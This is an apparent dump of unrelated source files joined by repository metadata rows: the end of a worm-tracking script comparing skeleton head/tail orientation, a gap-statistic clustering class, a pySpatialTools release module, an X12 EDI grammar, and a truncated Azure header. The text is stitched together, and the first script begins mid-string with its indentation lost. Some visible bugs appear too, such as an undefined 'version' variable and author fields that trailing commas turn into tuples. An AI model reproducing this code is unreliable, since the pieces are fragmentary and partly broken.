/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-101 (e1265) on food R_2010_09_24__11_35___3___2.hdf5
810-810, 18597-18597, 18608-18608, 23978-23982, 23988-23993
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-38 (e264)I on food L_2010_08_19__12_34_15___1___6.hdf5
7480-7582, 7590-7590, 7596-7596, 7603-7607, 7617-7643, 7652-7652, 7663-7722, 7733-7736, 7806-7963
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-76 (e911)V on food L_2010_04_14__11_22_30___8___5.hdf5
12445-12445, 12455-12459, 12475-12316, 12242-13344, 13354-13362, 13368-15598, 18411-18411, 18510-18510
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-76 (e911)V on food R_2010_04_13__11_06_24___4___3.hdf5
3240-3249, 3258-3265, 3286-3294, 3328-3332, 18547-18547, 18585-18589
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-101 (e1265) on food L_2010_09_17__16_04_15___1___8.hdf5
20530-20530, 20536-23004 '''
bad_track_files_str = '''/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-32 (e189) on food L_2009_12_09__15_57_51___2___13.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/acr-21 (ok1314)III on food L_2010_02_24__14_45_13__11.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-17 (e245) on food R_2010_04_16__14_27_23___2___8.hdf5'''
wrong_files_str = '''/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-1 (e1598)X on food R_2010_04_14__11_58_21___2___7.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-18 (e81)X on food R_2011_08_09__12_33_45___8___7.hdf5'''
partial_wrong_files_str ='''/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-18 (e81)X on food R_2011_08_24__10_24_18__2.hdf5
17709-17735, 17743-17758, 17772-17772, 17782-17788, 17795-17795, 17801-17801'''
good_files = good_files_str.split('\n')
bad_track_files = bad_track_files_str.split('\n')
wrong_files = wrong_files_str.split('\n')
def read_partial_files(f_str):
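    # Parse alternating lines of "<file path>" and "<start-end, start-end, ...>"
    # frame ranges into (fnames, {fname: [(start, end), ...]})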
dd = f_str.split('\n')
index_dict = {}
fnames = []
for ii in range(0, len(dd),2 ):
fname = dd[ii]
indexes_str = dd[ii+1]
indexes = [tuple(map(int, x.split('-'))) for x in indexes_str.split(', ') if x]
index_dict[fname] = indexes
fnames.append(fname)
return fnames, index_dict
partial_files, bad_index_dict = read_partial_files(partial_files_str)
wrong_partial_files, good_index_dict = read_partial_files(partial_wrong_files_str)
files = bad_track_files + partial_files + wrong_partial_files+ wrong_files + good_files
all_dat = []
for mask_id, masked_image_file in enumerate(files):
dd = masked_image_file[:-5]
segworm_feat_file = dd + '_features.mat'
skeletons_file = dd + '_skeletons.hdf5'
features_file = dd + '_features.hdf5'
if not os.path.exists(features_file):
continue
print(mask_id, masked_image_file)
    #read data from the new skeletons
skeletons = np.zeros(0) #just to be sure i am not using a skeleton for another file
with tables.File(features_file, 'r') as fid:
#if '/features_means' in fid and \
#fid.get_node('/features_means').attrs['has_finished'] and \
#fid.get_node('/features_timeseries').shape[0]>0:
skeletons = fid.get_node('/skeletons')[:]
if skeletons.size > 0:
frame_range = fid.get_node('/features_events/worm_1')._v_attrs['frame_range']
            #pad the beginning with np.nan to have the same reference as segworm (time 0)
skeletons = np.pad(skeletons, [(frame_range[0],0), (0,0), (0,0)],
'constant', constant_values=np.nan)
#else:
# continue
with tables.File(skeletons_file, 'r') as fid:
timestamp_raw = fid.get_node('/timestamp/raw')[:].astype(np.int)
#read data from the old skeletons
fvars = loadmat(segworm_feat_file, struct_as_record=False, squeeze_me=True)
micronsPerPixels_x = fvars['info'].video.resolution.micronsPerPixels.x
micronsPerPixels_y = fvars['info'].video.resolution.micronsPerPixels.y
segworm_x = -fvars['worm'].posture.skeleton.x.T
segworm_y = -fvars['worm'].posture.skeleton.y.T
segworm = np.stack((segworm_x,segworm_y), axis=2)
#get the total number of skeletons
tot_skel = np.sum(~np.isnan(skeletons[:,0,0]))
tot_seg = np.sum(~np.isnan(segworm[:,0,0]))
    #correct in case the two data sets have different shapes
max_n_skel = min(segworm.shape[0], skeletons.shape[0])
skeletons = skeletons[:max_n_skel]
segworm = segworm[:max_n_skel]
    #shift the skeletons coordinate system to one that diminishes the errors the most.
seg_shift = np.nanmedian(skeletons-segworm, axis = (0,1))
segworm += seg_shift
#print('S', seg_shift)
#%%
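    # Per-frame distance between the new skeletons and segworm, summed over all
    # skeleton points: R_ori uses the original orientation, R_inv reverses the
    # new skeleton head-to-tail. Frames where the reversed skeleton fits better
    # are counted as head/tail mismatches (ht_mismatch == 1).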
R_ori = np.sum(np.sqrt(np.sum((skeletons-segworm)**2, axis=2)), axis=1)
R_inv = np.sum(np.sqrt(np.sum((skeletons[:,::-1,:]-segworm)**2, axis=2)), axis=1)
bad_ind = np.isnan(R_ori)
ht_mismatch = np.argmin((R_ori, R_inv), axis =0)
ht_mismatch[bad_ind] = 0
#%%
bad_vec = np.zeros(skeletons.shape[0], np.bool)
if masked_image_file in bad_index_dict:
bad_indexes = bad_index_dict[masked_image_file]
for bad_index in bad_indexes:
bad_timestamp = timestamp_raw[bad_index[0]:bad_index[1]+1]
bad_vec[bad_timestamp] = True
        #make False the ones without skeletons to avoid double counting
bad_vec[np.isnan(skeletons[:,0,0])] = False
elif masked_image_file in good_index_dict:
good_indexes = good_index_dict[masked_image_file]
bad_vec = ~np.isnan(skeletons[:,0,0])
for good_index in good_indexes:
good_timestamp = timestamp_raw[good_index[0]:good_index[1]+1]
bad_vec[good_timestamp] = False
elif masked_image_file in wrong_files:
bad_vec = ~np.isnan(skeletons[:,0,0])
else:
tot_bad_skel = 0
tot_bad_skel = sum(bad_vec)
good_ind = ~bad_ind
tot_common = np.sum(good_ind)
#%%
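    # Cross-tabulate per-frame head/tail correctness: bad_vec marks frames whose
    # new-tracker orientation was manually annotated as wrong, while ht_mismatch
    # marks frames where the new and old (segworm) orientations disagree, e.g.
    # new1old0 counts frames where the new tracker is right and segworm is wrong.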
new1old0 = np.sum(ht_mismatch & ~bad_vec & good_ind)
new0old1 = np.sum(ht_mismatch & bad_vec & good_ind)
new1old1 = np.sum(~ht_mismatch & ~bad_vec & good_ind)
new0old0 = np.sum(~ht_mismatch & bad_vec & good_ind)
#%%
all_dat.append((tot_skel, tot_seg, tot_bad_skel, tot_common, new1old0, new0old1, new1old1, new0old0))
#%%
if False:
w_xlim = w_ylim = (-10, skeletons.shape[0]+10)
plt.figure()
plt.subplot(2,1,1)
plt.plot(skeletons[:,1,1], 'b')
plt.plot(segworm[:,1,1], 'r')
plt.xlim(w_ylim)
plt.ylabel('Y coord')
plt.subplot(2,1,2)
plt.plot(skeletons[:,1,0], 'b')
plt.plot(segworm[:,1,0], 'r')
plt.xlim(w_xlim)
plt.ylabel('X coord')
plt.xlabel('Frame Number')
#%%
tot_skel, tot_seg, tot_bad_skel, tot_common, new1old0, new0old1, new1old1, new0old0 = zip(*all_dat)
only_seg = tuple(x-y for x,y in zip(tot_seg, tot_common))
only_skel = tuple(x-y for x,y in zip(tot_skel, tot_common))
#%%
#%%
tot_skels = sum(tot_skel)
tot_segs = sum(tot_seg)
tot_commons = sum(tot_common)
tot_union = tot_skels + tot_segs - tot_commons
frac_only_seg = (tot_segs - tot_commons) / tot_union
frac_only_skel = (tot_skels - tot_commons) / tot_union
frac_mutual = tot_commons / tot_union
#%%
frac_skel_bad = sum(tot_bad_skel)/tot_skels
#%%
skel_bad_common =1-(sum(new1old0) + sum(new1old1))/tot_commons
seg_bad_common = 1-(sum(new0old1) + sum(new1old1))/tot_commons
#%%
main_dir = '/Users/ajaver/Desktop/Videos/single_worm/switched_sample/'
all_files = [os.path.join(main_dir, x) for x in os.listdir(main_dir) if not '_features' in x and not '_skeletons' in x and not x.startswith('.')]
print([x for x in all_files if x not in files])
#%%
bad_old = [(x+y)/z for x,y,z in zip(new1old0, new0old0, tot_common)]
bad_new = [(x+y)/z for x,y,z in zip(new0old1, new0old0, tot_common)]
plt.figure()
plt.plot(bad_old, 'sr')
plt.plot(bad_new, 'og')
| [
"[email protected]"
] | |
c2a6c7801f3547946b38492ef118dd975aae1772 | e6c17803c9f60dbeafa7e866d7e108a3239d799d | /what_the_cluster/GapStat.py | 1f928a08083bccde57f61c9a8b280bc201d89c3b | [] | no_license | idc9/what_the_cluster | e6cf04730e224625a0bce21f7a9730a4984d54bd | 50f024e214cf6f4f4f976ac104d50a0c9a7a6d94 | refs/heads/master | 2020-03-11T17:46:27.297370 | 2018-09-19T21:53:59 | 2018-09-19T21:53:59 | 130,156,780 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,107 | py | from math import sqrt
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from sklearn.externals import joblib
from scipy.sparse import issparse
from what_the_cluster.gapstat_utils import get_pooled_wcss, estimate_n_clusters
from what_the_cluster.reference_dists import sample_svd_null, sample_uniform_null
from what_the_cluster.utils import _is_strictly_increasing, _count_none, svd_wrapper
from what_the_cluster.clusterers import get_clusterer
# TODO: implement seeds
# TODO: give clusterer the option to return additional data
# TODO: give user the ability to input pre-sampled reference distributions
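# A minimal usage sketch (assumes fit(), defined below, populates the
# est_n_clusters attribute referenced in __init__'s commented-out attribute list):
#
#   gs = GapStat(clusterer='kmeans', cluster_sizes=list(range(1, 11)), B=10)
#   gs.fit(X)                     # X: data matrix, observations on the rows
#   print(gs.est_n_clusters)      # estimated number of clusters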
class GapStat(object):
def __init__(self,
clusterer='kmeans',
clusterer_kwargs={},
cluster_sizes=list(range(1, 11)),
ref_dist='uniform',
B=10,
gap_est_method='Tibs2001SEmax'):
"""
For details see Estimating the Number of Clusters in a Data Set via
the Gap Statistic by R. Tibshirani, G. Walther and T. Hastie, 2001.
Parameters
----------
clusterer (str, function): a function which computes clusters.
            If clusterer is a string, then it will use one of the pre-implemented
clustering algorithms from clusterers.py. Available options include
['kmeans']
            If clusterer is a function then it should accept two arguments:
(X, n_clusters) where X is the data set to cluster and n_clusters
is the number of desired clusters to estimate. This function should
return a list of estimated clusters for each observation.
        clusterer_kwargs (None, dict): dict of keyword arguments for the
            clusterer function. See the documentation for the original functions
for available arguments (linked to in clusterers.py)
Warning: these are only applied for the
pre-implemented clusterers i.e. if clusterer is a string.
cluster_sizes (list): list of n_clusters to evaluate. Must be
strictly increasing.
ref_dist (str): which null reference distribution to use. Either
            ['uniform', 'svd']. 'uniform' will draw uniform samples
            from a box which has the same range as the data. 'svd' will
            use the principal components to better adapt the shape of
the reference distribution to the observed data set.
See (Tibshirani et al, 2001) for details.
        B (int): number of samples of the null reference set to draw to estimate
the E log(W)
gap_est_method (str): how to select the local max using the gap
statistic. Currently one of ['firstmax', 'globalmax',
'Tibs2001SEmax']. See estimate_n_clusters() for details.
"""
assert ref_dist in ['uniform', 'svd']
assert _is_strictly_increasing(cluster_sizes)
self.ref_dist = ref_dist
self.B = B
self.cluster_sizes = cluster_sizes
self.gap_est_method = gap_est_method
if callable(clusterer):
# there might be an issue with python 3.x for x <2
# see https://stackoverflow.com/questions/624926/how-do-i-detect-whether-a-python-variable-is-a-function
self.clusterer_name = 'custom'
self.clusterer = clusterer
if clusterer_kwargs is not None:
# TODO: make this a proper Warning
print("WARNING: clusterer_kwargs is only use for pre-implemented clusterers")
else:
self.clusterer_name = clusterer
if clusterer == 'custom':
# this means we are loading a saved version of this object
                # and we didn't save the clusterer function, which should be
# saved separately
self.clusterer = None
else:
self.clusterer = get_clusterer(clusterer, clusterer_kwargs)
# only store this in case we save this object to disk
self.clusterer_kwargs = clusterer_kwargs
# these attributes will be set later
# self.X = None # observed data
# self.U = None # U, D, V are SVD of X
# self.D = None
# self.V = None
# self.obs_cluster_labels = None
# self.obs_wcss = None
# self.null_wcss_samples = None
# self.est_n_clusters = None
# self.possible_n_clusters = None
# self.metadata = {}
def get_params(self):
return {'clusterer': self.clusterer,
'clusterer_kwargs': self.clusterer_kwargs,
'cluster_sizes': self.cluster_sizes,
'ref_dist': self.ref_dist,
'B': self.B,
'gap_est_method': self.gap_est_method}
def fit(self, X, cluster_labels=None,
U=None, D=None, V=None):
"""
Estimates the number of clusters using the gap statistic.
Parameters
----------
X (matrix): the observed data with observations on the rows.
cluster_labels (None or matrix, observations x len(cluster_sizes)): matrix
containing the observed cluster labels on the columns for each
value of n_clusters.
            If None, the observed cluster labels will be computed with the
            provided clusterer for each value of n_clusters.
        U, D, V: the precomputed SVD of X (see svd_wrapper() for
            details). These are only used if ref_dist = 'svd'. If they are
            not provided then they will be computed.
"""
if type(X) == pd.DataFrame:
self.var_names = np.array(X.columns)
else:
self.var_names = np.array(range(X.shape[1]))
if not issparse(X):
X = np.array(X)
if cluster_labels is None:
cluster_labels = self.compute_obs_clusters(X)
        assert cluster_labels.shape == (X.shape[0], len(self.cluster_sizes))
        # store the observed labels so est_cluster_memberships can find them later
        self.obs_cluster_labels = cluster_labels
if self.ref_dist == 'svd':
if _count_none(U, D, V) == 3:
U, D, V = svd_wrapper(X)
elif _count_none(U, D, V) != 0:
raise ValueError('U, D, V must all be provided or be set to None')
self.obs_wcss = self.compute_obs_wcss(X, cluster_labels)
self.null_wcss_samples = self.sample_ref_null_wcss(X, U=U, D=D, V=V)
self.compute_n_cluster_estimate(method=self.gap_est_method)
return self
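    # Minimal usage sketch (added for illustration, not from the original
    # docs; assumes `X` is an (observations x features) numpy array and the
    # default kmeans clusterer is available):
    #
    #   gs = GapStat(clusterer='kmeans', cluster_sizes=list(range(1, 11)), B=10)
    #   gs.fit(X)
    #   print(gs.est_n_clusters)          # estimated number of clusters
    #   labels = gs.est_cluster_memberships
    #   gs.plot_gap(errorbars=True)       # inspect the gap curve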
@property
def est_cluster_memberships(self):
"""
Returns the estimated cluster memberships
"""
assert self.est_n_clusters is not None
est_cluster_size_ind = np.where(
np.array(self.cluster_sizes) == self.est_n_clusters)[0][0]
return self.obs_cluster_labels[:, est_cluster_size_ind]
def compute_obs_clusters(self, X):
obs_cluster_labels = np.zeros((X.shape[0], len(self.cluster_sizes)))
for i, n_clusters in enumerate(self.cluster_sizes):
obs_cluster_labels[:, i] = self.clusterer(X, n_clusters)
return obs_cluster_labels
def compute_obs_wcss(self, X, obs_cluster_labels):
"""
        Computes the within-class sum of squares for the observed clusters.
"""
n_cluster_sizes = len(self.cluster_sizes)
obs_wcss = np.zeros(n_cluster_sizes)
for j in range(n_cluster_sizes):
# make sure the number of unique cluster labels is equal to
            # the purported number of clusters
            # TODO: we might not want this restriction
assert len(set(obs_cluster_labels[:, j])) \
== self.cluster_sizes[j]
obs_wcss[j] = get_pooled_wcss(X, obs_cluster_labels[:, j])
return obs_wcss
def sample_null_reference(self, X, U=None, D=None, V=None):
if self.ref_dist == 'uniform':
return sample_uniform_null(X)
elif self.ref_dist == 'svd':
return sample_svd_null(X, U, D, V)
def sample_ref_null_wcss(self, X, U=None, D=None, V=None):
null_wcss_samples = np.zeros((len(self.cluster_sizes), self.B))
for b in range(self.B):
# sample null reference distribution
X_null = self.sample_null_reference(X, U=U, D=D, V=V)
# cluster X_null for the specified n_clusters
for i, n_clusters in enumerate(self.cluster_sizes):
                # cluster the null sample
null_cluster_labels = self.clusterer(X_null, n_clusters)
null_wcss_samples[i, b] = get_pooled_wcss(X_null,
null_cluster_labels)
return null_wcss_samples
@property
def E_log_null_wcss_est(self):
"""
Estimate of the expected log(WCSS) of the null reference distribution
"""
assert self.null_wcss_samples is not None
return np.log(self.null_wcss_samples).mean(axis=1)
@property
def E_log_null_wcss_est_sd(self):
"""
Standard deviation of the estimated expected log(WCSS) from the null
        distribution
"""
assert self.null_wcss_samples is not None
return np.std(np.log(self.null_wcss_samples), axis=1)
@property
def log_obs_wcss(self):
"""
        log(WCSS) of the observed clusters
"""
assert self.obs_wcss is not None
return np.log(self.obs_wcss)
@property
def gap(self):
"""
Returns the gap statistic i.e. E*(log(WCSS_null)) - log(WCSS_obs)
where E* means the estimated expected value
"""
assert self.obs_wcss is not None
return self.E_log_null_wcss_est - self.log_obs_wcss
@property
def adj_factor(self):
return sqrt(1.0 + (1.0/self.B))
def compute_n_cluster_estimate(self, method=None):
"""
Parameters
----------
method (str): which method to use to estimate the number of clusters.
Currently one of ['firstmax', 'globalmax', 'Tibs2001SEmax']
            firstmax: finds the first local max of f
globalmax: finds the global max of f
Tibs2001SEmax: uses the method detailed in (Tibshirani et al, 2001)
i.e. the first k (smallest number of clusters) such that
f[k] >= f[k + 1] - se[k + 1] * se_adj_factor
        Output
        ------
        Sets self.est_n_clusters (the estimated number of clusters) and
        self.possible_n_clusters (the other local maxima found by the given
        method).
"""
if method is None:
method = self.gap_est_method
est_n_clusters, possibilities = \
estimate_n_clusters(cluster_sizes=self.cluster_sizes,
f=self.gap,
se=self.E_log_null_wcss_est_sd,
se_adj_factor=self.adj_factor,
method=method)
self.gap_est_method = method
self.est_n_clusters = est_n_clusters
self.possible_n_clusters = possibilities
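    # Worked toy illustration of the 'Tibs2001SEmax' rule (added sketch, not
    # part of the original code). With
    #   cluster_sizes = [1, 2, 3, 4]
    #   gap           = [0.10, 0.30, 0.28, 0.25]
    #   se            = [0.02, 0.02, 0.02, 0.02]
    # and adj = sqrt(1 + 1/B) ~= 1.05 for B = 10, the rule returns the first
    # k with gap[k] >= gap[k + 1] - se[k + 1] * adj, i.e. k = 2 clusters here
    # (0.30 >= 0.28 - 0.02 * 1.05).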
def plot_wcss_curves(self):
# plot observed log(WCSS)
plt.plot(self.cluster_sizes,
self.log_obs_wcss,
marker="$O$",
color='blue',
ls='solid',
label='obs')
# plot the expected log(WCSS) of the null references
plt.plot(self.cluster_sizes,
self.E_log_null_wcss_est,
marker='$E$',
color='red',
ls='dashed',
label='E null')
plt.xticks(self.cluster_sizes)
plt.xlabel('number of clusters')
plt.ylabel('log(WCSS)')
plt.legend()
def plot_gap(self, errorbars=True, include_est=True,
include_possibilities=False):
if errorbars:
# TODO: should we use s_adj for error bars?
plt.errorbar(self.cluster_sizes,
self.gap,
color='black',
yerr=self.E_log_null_wcss_est_sd)
else:
plt.plot(self.cluster_sizes,
self.gap,
color='black',
marker='x')
plt.xticks(self.cluster_sizes)
plt.xlabel('number of clusters')
plt.ylabel('gap')
# maybe include the estimated numer of clusters
if include_est:
plt.axvline(x=self.est_n_clusters, color='red',
label='estimated {} clusters'.
format(self.est_n_clusters))
# maybe include other possible estimates
if include_possibilities:
label = 'possibility'
for n in self.possible_n_clusters:
if n == self.est_n_clusters:
continue
plt.axvline(x=n, color='blue', ls='dashed', lw=1, label=label)
label = '' # HACK: get only one 'possibility' label to show up
plt.legend()
def save(self, fname, compress=True, include_data=False):
# save_dict = {'ref_dist': self.ref_dist,
# 'B': self.B,
# 'cluster_sizes': self.cluster_sizes,
# 'gap_est_method': self.gap_est_method,
# 'clusterer_name': self.clusterer_name,
# 'clusterer_kwargs': self.clusterer_kwargs,
# 'obs_cluster_labels': self.obs_cluster_labels,
# 'obs_wcss': self.obs_wcss,
# 'null_wcss_samples': self.null_wcss_samples,
# 'est_n_clusters': self.est_n_clusters,
# 'possible_n_clusters': self.possible_n_clusters,
# 'metadata': self.metadata}
# if include_data:
# save_dict['X'] = self.X
# save_dict['U'] = self.U
# save_dict['D'] = self.D
# save_dict['V'] = self.V
# else:
# save_dict['X'] = None
# save_dict['U'] = None
# save_dict['D'] = None
# save_dict['V'] = None
joblib.dump(self,
filename=fname,
compress=compress)
# @classmethod
# def load_from_dict(cls, load_dict):
# # initialize class
# GS = cls(clusterer=load_dict['clusterer_name'],
# clusterer_kwargs=load_dict['clusterer_kwargs'],
# cluster_sizes=load_dict['cluster_sizes'],
# ref_dist=load_dict['ref_dist'],
# B=load_dict['B'],
# gap_est_method=load_dict['gap_est_method'])
# GS.obs_cluster_labels = load_dict['obs_cluster_labels']
# GS.obs_wcss = load_dict['obs_wcss']
# GS.null_wcss_samples = load_dict['null_wcss_samples']
# GS.est_n_clusters = load_dict['est_n_clusters']
# GS.possible_n_clusters = load_dict['possible_n_clusters']
# GS.X = load_dict['X']
# GS.U = load_dict['U']
# GS.D = load_dict['D']
# GS.V = load_dict['B']
# GS.metadata = load_dict['metadata']
# return GS
@classmethod
def load(cls, fname):
# load_dict = joblib.load(fname)
# return cls.load_from_dict(load_dict)
return joblib.load(fname)
@classmethod
def from_precomputed_wcss(cls, cluster_sizes, obs_wcss,
null_wcss_samples, **kwargs):
"""
        Initializes a GapStat object from precomputed obs_wcss and
        null_wcss_samples.
"""
assert len(obs_wcss) == len(cluster_sizes)
assert null_wcss_samples.shape[0] == len(cluster_sizes)
GS = cls(cluster_sizes=cluster_sizes, **kwargs)
GS.obs_wcss = obs_wcss
GS.null_wcss_samples = null_wcss_samples
        GS.B = null_wcss_samples.shape[1]  # NOTE: B may be different
GS.compute_n_cluster_estimate()
return GS
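        # Sketch (added; not in the original file): if the WCSS values were
        # computed elsewhere,
        #   GS = GapStat.from_precomputed_wcss(cluster_sizes=[1, 2, 3],
        #                                      obs_wcss=obs_wcss,
        #                                      null_wcss_samples=null_wcss)
        # gives access to the gap curve and the cluster-number estimate without
        # re-running any clustering.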
| [
"[email protected]"
] | |
7cc5e26b3b002ea59b7a91392cf6ad2b4d9042bb | 12b5584956797fcb0f48e7971bc074ae13a37489 | /pySpatialTools/release.py | b4439a5b0eb2c44ff32c36629289ad36af5e241a | [
"MIT"
] | permissive | tgquintela/pySpatialTools | a0ef5b032310aa1c140e805f4ee8c4a40fd2d10e | e028008f9750521bf7d311f7cd3323c88d621ea4 | refs/heads/master | 2020-05-21T22:09:08.858084 | 2017-02-10T11:18:41 | 2017-02-10T11:18:41 | 39,067,763 | 8 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,919 | py | """Release data for pySpatialTools.
The information of the version is in the version.py file.
"""
from __future__ import absolute_import
import os
import sys
import time
import datetime
basedir = os.path.abspath(os.path.split(__file__)[0])
## Quantify the version
MAJOR = 0
MINOR = 0
MICRO = 0
ISRELEASED = False
VERSION = '%d.%d.%d' % (MAJOR, MINOR, MICRO)
QUALIFIER = ''
def write_version_py(filename=None):
cnt = """\
version = '%s'
"""
if not filename:
filename = os.path.join(
os.path.dirname(__file__), 'pySpatialTools', 'version.py')
a = open(filename, 'w')
try:
a.write(cnt % (version))
finally:
a.close()
def write_versionfile():
"""Creates a static file containing version information."""
versionfile = os.path.join(basedir, 'version.py')
text = '''"""
Version information for pySpatialTools, created during installation by
setup.py.
Do not add this file to the repository.
"""
import datetime
version = %(version)r
date = %(date)r
# Development version
dev = %(dev)r
# Format: (name, major, minor, micro, revision)
version_info = %(version_info)r
# Format: a 'datetime.datetime' instance
date_info = %(date_info)r
# Format: (vcs, vcs_tuple)
vcs_info = %(vcs_info)r
'''
# Try to update all information
date, date_info, version, version_info, vcs_info = get_info(dynamic=True)
def writefile():
fh = open(versionfile, 'w')
subs = {
'dev': dev,
'version': version,
'version_info': version_info,
'date': date,
'date_info': date_info,
'vcs_info': vcs_info
}
fh.write(text % subs)
fh.close()
## Mercurial? Change that
if vcs_info[0] == 'mercurial':
# Then, we want to update version.py.
writefile()
else:
if os.path.isfile(versionfile):
# This is *good*, and the most likely place users will be when
# running setup.py. We do not want to overwrite version.py.
# Grab the version so that setup can use it.
sys.path.insert(0, basedir)
from version import version
del sys.path[0]
else:
# Then we write a new file.
writefile()
return version
def get_revision():
"""Returns revision and vcs information, dynamically obtained."""
vcs, revision, tag = None, None, None
hgdir = os.path.join(basedir, '..', '.hg')
gitdir = os.path.join(basedir, '..', '.git')
if os.path.isdir(gitdir):
vcs = 'git'
# For now, we are not bothering with revision and tag.
vcs_info = (vcs, (revision, tag))
return revision, vcs_info
def get_info(dynamic=True):
## Date information
date_info = datetime.datetime.now()
date = time.asctime(date_info.timetuple())
revision, version, version_info, vcs_info = None, None, None, None
import_failed = False
dynamic_failed = False
if dynamic:
revision, vcs_info = get_revision()
if revision is None:
dynamic_failed = True
if dynamic_failed or not dynamic:
# All info should come from version.py. If it does not exist, then
# no vcs information will be provided.
sys.path.insert(0, basedir)
try:
from version import date, date_info, version, version_info,\
vcs_info
except ImportError:
import_failed = True
vcs_info = (None, (None, None))
else:
revision = vcs_info[1][0]
del sys.path[0]
if import_failed or (dynamic and not dynamic_failed):
# We are here if:
# we failed to determine static versioning info, or
# we successfully obtained dynamic revision info
version = ''.join([str(major), '.', str(minor), '.', str(micro)])
if dev:
version += '.dev_' + date_info.strftime("%Y%m%d%H%M%S")
version_info = (name, major, minor, micro, revision)
return date, date_info, version, version_info, vcs_info
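# Illustrative note (added): with the module-level defaults below, a
# development build yields version == '0.0.0.dev_YYYYMMDDHHMMSS' and
# version_info == ('pySpatialTools', '0', '0', '0', None) when no vcs
# revision can be found.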
## Version information
name = 'pySpatialTools'
major = "0"
minor = "0"
micro = "0"
## Declare current release as a development release.
## Change to False before tagging a release; then change back.
dev = True
description = """Python package for studying spatial irregular heterogenous
data."""
long_description = """
This package is built to provide prototyping tools in python to deal
with spatial data and to model spatially derived relations between
different elements in a system. In some systems, due to the huge amount of
data, the complexity of their topology, their local nature or other
practical reasons, we are forced to use only local information to model the
system properties and dynamics.
pySpatialTools is useful for complex topological systems with different types
of spatial data elements and feature data elements in which we are not able
to study them all at once because of the data size.
pySpatialTools may not be recommendable for treating some specific problems
with homogeneous and/or regular data which could be treated with other python
packages, as for example computational linguistics (nltk), computer vision or
grid data (scipy.ndimage and openCV) or others.
"""
## Main author
author = 'T. Gonzalez Quintela',
author_email = '[email protected]',
license = 'MIT'
authors = {'tgquintela': ('T. Gonzalez Quintela', '[email protected]')}
maintainer = ""
maintainer_email = ""
url = ''
download_url = ''
platforms = ['Linux', 'Mac OSX', 'Windows', 'Unix']
keywords = ['math', 'data analysis', 'Mathematics', 'spatial networks',
'spatial correlations', 'framework', 'social sciences',
'spatial analysis', 'spatial ecology']
classifiers = [
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 3 - Alpha',
# Indicate who your project is intended for
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
# Pick your license as you wish (should match "license" above)
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
# Specify the Python versions you support here
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
# Topic information
'Topic :: Software Development :: Build Tools',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Scientific/Engineering :: Sociology',
'Topic :: Scientific/Engineering :: Data Analysis',
'Topic :: Scientific/Engineering :: Information Analysis',
'Topic :: Scientific/Engineering :: Mathematics']
date, date_info, version, version_info, vcs_info = get_info()
if __name__ == '__main__':
# Write versionfile for nightly snapshots.
write_versionfile()
| [
"[email protected]"
] | |
645b5682e9763727540ac5d791536bf21623922f | 62e58c051128baef9452e7e0eb0b5a83367add26 | /x12/5020/309005020.py | 83361578777dc5a5345e3f1329482955522de273 | [] | no_license | dougvanhorn/bots-grammars | 2eb6c0a6b5231c14a6faf194b932aa614809076c | 09db18d9d9bd9d92cefbf00f1c0de1c590fe3d0d | refs/heads/master | 2021-05-16T12:55:58.022904 | 2019-05-17T15:22:23 | 2019-05-17T15:22:23 | 105,274,633 | 0 | 0 | null | 2017-09-29T13:21:21 | 2017-09-29T13:21:21 | null | UTF-8 | Python | false | false | 1,711 | py | from bots.botsconfig import *
from records005020 import recorddefs
syntax = {
'version' : '00403', #version of ISA to send
'functionalgroup' : 'AQ',
}
structure = [
{ID: 'ST', MIN: 1, MAX: 1, LEVEL: [
{ID: 'M10', MIN: 1, MAX: 1},
{ID: 'VEH', MIN: 0, MAX: 10},
{ID: 'CII', MIN: 0, MAX: 3},
{ID: 'NM1', MIN: 0, MAX: 999, LEVEL: [
{ID: 'DMG', MIN: 0, MAX: 1},
{ID: 'DMA', MIN: 0, MAX: 1},
{ID: 'REF', MIN: 0, MAX: 10},
{ID: 'N3', MIN: 0, MAX: 2},
{ID: 'N4', MIN: 0, MAX: 1},
]},
{ID: 'P4', MIN: 1, MAX: 20, LEVEL: [
{ID: 'LX', MIN: 1, MAX: 9999, LEVEL: [
{ID: 'M13', MIN: 0, MAX: 1},
{ID: 'M11', MIN: 0, MAX: 1},
{ID: 'N9', MIN: 0, MAX: 999},
{ID: 'N1', MIN: 0, MAX: 20, LEVEL: [
{ID: 'N3', MIN: 0, MAX: 2},
{ID: 'N4', MIN: 0, MAX: 1},
{ID: 'DTM', MIN: 0, MAX: 1},
{ID: 'PER', MIN: 0, MAX: 1},
{ID: 'X1', MIN: 0, MAX: 1},
]},
{ID: 'M12', MIN: 0, MAX: 1, LEVEL: [
{ID: 'R4', MIN: 0, MAX: 10},
]},
{ID: 'VID', MIN: 0, MAX: 999, LEVEL: [
{ID: 'M7', MIN: 0, MAX: 5},
{ID: 'N10', MIN: 0, MAX: 999, LEVEL: [
{ID: 'VC', MIN: 0, MAX: 999},
{ID: 'MAN', MIN: 0, MAX: 999},
{ID: 'H1', MIN: 0, MAX: 99, LEVEL: [
{ID: 'H2', MIN: 0, MAX: 99},
]},
]},
]},
]},
]},
{ID: 'SE', MIN: 1, MAX: 1},
]}
]
| [
"[email protected]"
] | |
3fa94711deee1501fffaea2ebd96a02444740ebb | f576f0ea3725d54bd2551883901b25b863fe6688 | /sdk/iothub/azure-mgmt-iothub/azure/mgmt/iothub/v2021_03_03_preview/aio/operations/_private_endpoint_connections_operations.py | 9539dfaa9da4998ba5e5dbec5e4b63fc87b7dedd | [
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
